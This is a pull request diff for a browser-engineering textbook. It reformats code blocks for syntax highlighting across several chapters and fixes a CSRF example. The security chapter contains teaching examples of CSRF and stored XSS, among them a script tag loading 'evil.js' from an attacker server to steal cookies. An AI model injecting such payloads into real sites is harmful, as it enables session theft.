### PR TITLE
Fix syntax highlighting for many code blocks

### DIFF
--- a/book/accessibility.md
+++ b/book/accessibility.md
@@ -160,19 +160,20 @@ To handle modifier keys, we'll need to listen to both "key down" and
 "key up" events in the event loop, and store whether the `Ctrl` key is pressed:
 
 ``` {.python}
+def mainloop(browser):
+    # ...
     ctrl_down = False
     while True:
 		if sdl2.SDL_PollEvent(ctypes.byref(event)) != 0:
-			# ...
             elif event.type == sdl2.SDL_KEYDOWN:
                 # ...
-                 elif event.key.keysym.sym == sdl2.SDLK_RCTRL or \
-                     event.key.keysym.sym == sdl2.SDLK_LCTRL:
-                     ctrl_down = True            	
+                elif event.key.keysym.sym == sdl2.SDLK_RCTRL or \
+                    event.key.keysym.sym == sdl2.SDLK_LCTRL:
+                    ctrl_down = True            	
              elif event.type == sdl2.SDL_KEYUP:
-                 if event.key.keysym.sym == sdl2.SDLK_RCTRL or \
-                     event.key.keysym.sym == sdl2.SDLK_LCTRL:
-                     ctrl_down = False
+                if event.key.keysym.sym == sdl2.SDLK_RCTRL or \
+                    event.key.keysym.sym == sdl2.SDLK_LCTRL:
+                    ctrl_down = False
              	# ...
 ```
 
@@ -180,7 +181,7 @@ Now we can have a case in the key handling code for "key down" events
 while the `Ctrl` key is held:
 
 ``` {.python}
-    ctrl_down = False
+def mainloop(browser):
     while True:
 		if sdl2.SDL_PollEvent(ctypes.byref(event)) != 0:
             elif event.type == sdl2.SDL_KEYDOWN:
@@ -481,9 +482,10 @@ before becoming widely used.
 We'll trigger dark mode in the event loop with `Ctrl-d`:
 
 ``` {.python}
+def mainloop(browser):
     while True:
         if sdl2.SDL_PollEvent(ctypes.byref(event)) != 0:
-            # ...
+            elif event.type == sdl2.SDL_KEYDOWN:
                 if ctrl_down:
                     # ...
                     elif event.key.keysym.sym == sdl2.SDLK_d:
@@ -830,6 +832,7 @@ minimizing or maximizing the browser window. Those require calling
 specialized OS APIs, so I won't implement them.
 
 ``` {.python}
+def mainloop(browser):
     while True:
         if sdl2.SDL_PollEvent(ctypes.byref(event)) != 0:
             elif event.type == sdl2.SDL_KEYDOWN:
@@ -900,6 +903,7 @@ the link.
 We'll start by binding those keys in the event loop:
 
 ``` {.python}
+def mainloop(browser):
     while True:
         if sdl2.SDL_PollEvent(ctypes.byref(event)) != 0:
             elif event.type == sdl2.SDL_KEYDOWN:
@@ -1898,13 +1902,14 @@ on and off. While real operating systems typically use more obscure
 shortcuts, I'll use `Ctrl-a` to turn on the screen reader in the event loop:
 
 ``` {.python}
+def mainloop(browser):
     while True:
         if sdl2.SDL_PollEvent(ctypes.byref(event)) != 0:
-            # ...
+            elif event.type == sdl2.SDL_KEYDOWN:
                 if ctrl_down:
                     # ...
                     elif event.key.keysym.sym == sdl2.SDLK_a:
-                        browser.toggle_accessibility()            
+                        browser.toggle_accessibility()
 ```
 
 The `toggle_accessibility` method tells the `Tab` that accessibility
@@ -2429,6 +2434,7 @@ So let's implement the read-on-hover feature. First we need to listen for mouse
 move events in the event loop, which in SDL are called `MOUSEMOTION`:
 
 ``` {.python}
+def mainloop(browser):
     while True:
         if sdl2.SDL_PollEvent(ctypes.byref(event)) != 0:
             # ...

--- a/book/animations.md
+++ b/book/animations.md
@@ -1897,12 +1897,12 @@ mostly a historical artifact.)
 
 [transform-def]: https://developer.mozilla.org/en-US/docs/Web/CSS/transform
 
-::: {.example}
-    <div style="background-color:lightblue;
-                transform:translate(50px, 50px)">Underneath</div>
-    <div style="background-color:lightgreen;
-                transform:translate(0px, 0px)">On top</div>
-:::
+``` {.html .example}
+<div style="background-color:lightblue;
+            transform:translate(50px, 50px)">Underneath</div>
+<div style="background-color:lightgreen;
+            transform:translate(0px, 0px)">On top</div>
+```
 
 Supporting these transforms is simple. First let's parse the property
 values:[^space-separated]

--- a/book/embeds.md
+++ b/book/embeds.md
@@ -20,7 +20,9 @@ content on the web,[^img-late] dating back to [early
 1993][img-email].[^img-history] They're included on web pages via the
 `<img>` tag, which looks like this:
 
-    <img src="https://browser.engineering/im/hes.jpg">
+``` {.html .example}
+<img src="https://browser.engineering/im/hes.jpg">
+```
 
 [img-email]: http://1997.webhistory.org/www.lists/www-talk.1993q1/0182.html
 
@@ -544,8 +546,10 @@ image on the screen!
 But what about our second output modality, screen readers? That's what
 the `alt` attribute is for. It works like this:
 
-    <img src="https://browser.engineering/im/hes.jpg"
-    alt="An operator using the Hypertext Editing System in 1969">
+``` {.html .example}
+<img src="https://browser.engineering/im/hes.jpg"
+  alt="An operator using the Hypertext Editing System in 1969">
+```
 
 Implementing this in `AccessibilityNode` is very easy:
 

--- a/book/html.md
+++ b/book/html.md
@@ -66,7 +66,9 @@ parser builds a tree one element or text node at a time. But that
 means the parser needs to store an *incomplete* tree as it goes. For example,
 suppose the parser has so far read this bit of HTML:
 
-    <html><video></video><section><h1>This is my webpage
+``` {.html .example}
+<html><video></video><section><h1>This is my webpage
+```
 
 The parser has seen five tags (and one text node). The rest of the
 HTML will contain more open tags, close tags, and text; but no matter

--- a/book/http.md
+++ b/book/http.md
@@ -729,7 +729,9 @@ executing this script from the command line. The code reads the first
 argument (`sys.argv[1]`) from the command line and uses it as a URL.
 Try running this code on the URL `http://example.org/`:
 
-    python3 browser.py http://example.org/
+``` {.sh}
+python3 browser.py http://example.org/
+```
 
 You should see some short text welcoming you to the official example
 web page. You can also try using it on [this chapter](https://browser.engineering/http.html)!

--- a/book/scripts.md
+++ b/book/scripts.md
@@ -41,7 +41,7 @@ The first step to using DukPy is installing it. On most machines,
 including on Windows, macOS, and Linux systems, you should be able to
 do this with:
 
-``` {.example}
+``` {.sh}
 python3 -m pip install dukpy
 ```
 

--- a/book/scripts.md
+++ b/book/scripts.md
@@ -1188,12 +1188,6 @@ should now look something like this:
 :::
 
 
-The server's outline is unchanged from the last chapter:
-
-::: {.cmd .python .outline html=True}
-    python3 infra/outlines.py --html src/server9.py
-:::
-
 Exercises
 =========
 

--- a/book/security.md
+++ b/book/security.md
@@ -654,9 +654,8 @@ called *cross-site request forgery*, often shortened to CSRF.
 In cross-site request forgery, instead of using `XMLHttpRequest,` the
 attacker uses a form that submits to the guest book:
 
-``` {.example}
-<form action="http://localhost:8000gs
-/add" method=post>
+``` {.html}
+<form action="http://localhost:8000/add" method=post>
   <p><input name=guest></p>
   <p><button>Sign the book!</button></p>
 </form>
@@ -988,16 +987,16 @@ Note that `entry` can be anything, including anything the user might
 stick into our comment form. That includes HTML tags, like a custom
 `<script>` tag! So, a malicious user could post this comment:
 
-::: {.example}
-    Hi! <script src="http://my-server/evil.js"></script>
-:::
+``` {.html .example}
+Hi! <script src="http://my-server/evil.js"></script>
+```
 
 The server would then output this HTML:
 
-::: {.example}
-    <p>Hi! <script src="http://my-server/evil.js"></script>
-    <i>by crashoverride</i></p>
-:::
+``` {.html .example}
+<p>Hi! <script src="http://my-server/evil.js"></script>
+<i>by crashoverride</i></p>
+```
 
 Every user's browser would then download and run the `evil.js` script,
 which can send[^document-cookie] the cookies

--- a/book/styles.md
+++ b/book/styles.md
@@ -17,7 +17,7 @@ Parsing with functions
 One way a web page can change its appearance is with the `style`\index{style}
 attribute. For example, this changes an element's background color:
 
-``` {.example}
+``` {.html .example style=background-color:lightblue}
 <div style="background-color:lightblue"></div>
 ```
 
@@ -257,12 +257,8 @@ I've removed the default gray background from `pre` elements for now,
 but we'll put it back soon.
 
 Load [the web version of this chapter](https://browser.engineering/styles.html)
-in your browser to test your code: the following code block
-should now have a light blue background:
-
-``` {.example style=background-color:lightblue}
-<div style="background-color:lightblue"> ... </div>
-```
+in your browser to test your code: the code block at the start of the chapter
+should now have a light blue background.
 
 So this is one way web pages can change their appearance. And in the
 early days of the web,^[I'm talking Netscape 3. The late 1990s.]

--- a/book/text.md
+++ b/book/text.md
@@ -133,7 +133,7 @@ Measuring text
 Text takes up space vertically and horizontally, and the font object's
 `metrics` and `measure` methods measure that space:[^spacing]
 
-``` {.example}
+``` {.python .example}
 >>> bi_times.metrics()
 {'ascent': 15, 'descent': 4, 'linespace': 19, 'fixed': 0}
 >>> bi_times.measure("Hi!")
@@ -193,7 +193,7 @@ varying heights:[^varying-times]
     specified a bold, italic Times font. The bold, italic Times font
     is taller, at least on my current macOS system!
 
-``` {.example}
+``` {.python .example}
 >>> tkinter.font.Font(family="Courier", size=16).metrics()
 {'fixed': 1, 'ascent': 13, 'descent': 4, 'linespace': 17}
 >>> tkinter.font.Font(family="Times", size=16).metrics()
@@ -206,7 +206,7 @@ The `measure()` method is more direct: it tells you how much
 *horizontal* space text takes up, in pixels. This depends on the text,
 of course, since different letters have different widths:[^widths]
 
-``` {.example}
+``` {.python .example}
 >>> bi_times.measure("Hi!")
 24
 >>> bi_times.measure("H")


### PR DESCRIPTION
This PR cherry-picks the copyediting-relevant fixes from #1161. There are roughly four categories of changes:

- One bug fix in `forms.md` where our example code is wrong (seems like a vim issue!)
- Standardizing code blocks in `accessibility.md` to use the same diff rules as elsewhere in the book
- In Chapter 9 we have an outline of the server despite there being no changes; I removed it
- A bunch of example code blocks get syntax highlighted

Obviously the first is most important but I think all of these are worth it before Friday.